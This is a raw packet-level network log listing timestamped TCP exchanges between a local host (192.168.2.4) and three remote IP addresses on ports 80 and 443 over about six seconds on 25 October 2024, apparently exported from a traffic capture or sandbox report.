Oct 25, 2024 21:27:15.970493078 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:15.970668077 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:15.971146107 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:15.976572990 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:17.317728996 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:17.317827940 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:17.317925930 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:17.322884083 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:17.322921991 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:17.334846020 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:17.335558891 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:17.335633039 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:17.336061954 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:17.336112976 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:17.345189095 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:17.345262051 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:17.345364094 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:17.345940113 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:17.345978022 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:17.954354048 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:17.968055964 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:17.968100071 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:18.118319988 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:18.118419886 CEST	443	49747	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:18.120070934 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:18.124337912 CEST	49747	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:18.261409998 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.261512995 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.264456987 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.264468908 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.264827967 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.310286045 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.311070919 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.351330042 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.594821930 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.639043093 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.755012035 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755023003 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755054951 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755062103 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755099058 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755098104 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.755146027 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.755179882 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.755179882 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.755214930 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.757937908 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.757953882 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.758033037 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.758050919 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.758127928 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.917293072 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.917354107 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.917423964 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.917471886 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:18.917504072 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:18.917550087 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.072927952 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.072976112 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.073024988 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.073071003 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.073092937 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.073196888 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.074610949 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.074668884 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.074693918 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.074707031 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.074734926 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.074755907 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.231973886 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.232039928 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.232083082 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.232131004 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.232163906 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.232189894 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.233263016 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.233304977 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.233350992 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.233362913 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.233387947 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.233408928 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.389870882 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.389931917 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.390096903 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.390098095 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.390170097 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.390248060 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.390450001 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.390500069 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.390542030 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.390556097 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.390583038 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.390605927 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.550621986 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.550676107 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.550733089 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.550733089 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.550801992 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.550865889 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.551789045 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.551831007 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.551884890 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.551898003 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.551928043 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.551965952 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.552083015 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.552123070 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.552150965 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.552161932 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.552186012 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.552206039 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.709522963 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.709546089 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.709615946 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.709642887 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.709697008 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.710282087 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.710297108 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.710350037 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.710362911 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.710387945 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.710412979 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.711393118 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.711433887 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.711479902 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.711491108 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.711517096 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.711600065 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.872704983 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.872777939 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.872828007 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.872899055 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.872941971 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.872965097 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.873536110 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.873578072 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.873610020 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.873622894 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.873651028 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.873982906 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874034882 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874062061 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.874075890 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874108076 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.874130011 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.874579906 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874622107 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874655962 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.874666929 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:19.874691963 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:19.875441074 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035083055 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035152912 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035305023 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035305023 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035341024 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035392046 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035778046 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035826921 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035868883 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035882950 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.035913944 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.035936117 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.036319017 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.036359072 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.036413908 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.036426067 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.036453962 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.036542892 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.036931992 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.036974907 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.037031889 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.037043095 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.037070036 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.037096024 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.196564913 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.196659088 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.196665049 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.196736097 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.196774006 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.196887970 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197114944 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197132111 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197187901 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197211981 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197236061 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197273970 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197408915 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197424889 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197479963 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197494984 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.197518110 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.197551966 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.198739052 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.198753119 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.198797941 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.198808908 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.198836088 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.198853016 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.357367039 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.357434034 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.357604980 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.357604980 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.357645988 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358069897 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358122110 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358154058 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358171940 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358205080 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358246088 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358288050 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358330965 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358361006 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358371973 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358397961 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358417988 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358798981 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358839989 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358877897 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358887911 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.358913898 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.358948946 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.359170914 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.359210968 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.359251976 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.359262943 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.359287977 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.359329939 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522017956 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522078991 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522123098 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522155046 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522171974 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522255898 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522819042 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522867918 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522897005 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522902012 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.522928953 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.522943974 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523168087 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523221970 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523252010 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523256063 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523283005 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523299932 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523804903 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523847103 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523883104 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523889065 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.523919106 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.523938894 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524095058 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524143934 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524188042 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524192095 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524219036 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524235964 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524640083 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524688005 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524723053 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524728060 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.524755001 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.524772882 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.685688972 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.685751915 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.685863972 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.685937881 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.685973883 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.685991049 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.685992002 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686013937 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686037064 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686047077 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686060905 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686080933 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686111927 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686134100 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686357975 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686403036 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686435938 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686446905 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686475992 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686599970 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686647892 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686666965 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686678886 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.686721087 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.686741114 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.687197924 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.687247038 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.687294960 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.687305927 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.687351942 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.687371969 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.691051960 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.846817017 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.846879005 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.846914053 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.846940994 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.846956015 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.846990108 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847127914 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847168922 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847202063 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847207069 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847250938 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847270012 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847486019 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847532988 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847584009 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847589016 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847620964 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847639084 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.847938061 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.847980976 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.848015070 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.848020077 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.848056078 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.848093033 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.848448038 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.848486900 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.848530054 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.848535061 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.848568916 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.848592043 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.853104115 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.963852882 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.963884115 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.963943005 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.963958025 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:20.963989973 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:20.964009047 CEST	49746	443	192.168.2.4	188.132.193.46
